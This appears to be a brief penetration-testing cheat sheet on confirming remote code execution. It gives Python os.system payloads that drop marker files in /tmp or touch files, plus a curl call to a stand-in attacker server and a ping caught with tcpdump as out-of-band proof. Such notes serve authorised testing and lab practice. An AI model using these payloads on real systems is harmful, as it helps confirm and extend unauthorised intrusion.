Confirming and Verifying RCE

Create a file as a marker

os.system('touch /tmp/pwned')

Write identifiable content to a file

os.system('echo "pwned" > /tmp/pwned.txt')

Modify timestamps or files you can access

os.system('touch -m /path/to/known/file')

Trigger network activity

Make an HTTP GET request to your server
os.system('curl http://your-server.com/ping')

You could also ping your own host:

ping -c 1 10.10.14.6
And catch it with tcpdump
sudo tcpdump -ni <interface> icmp

Last updated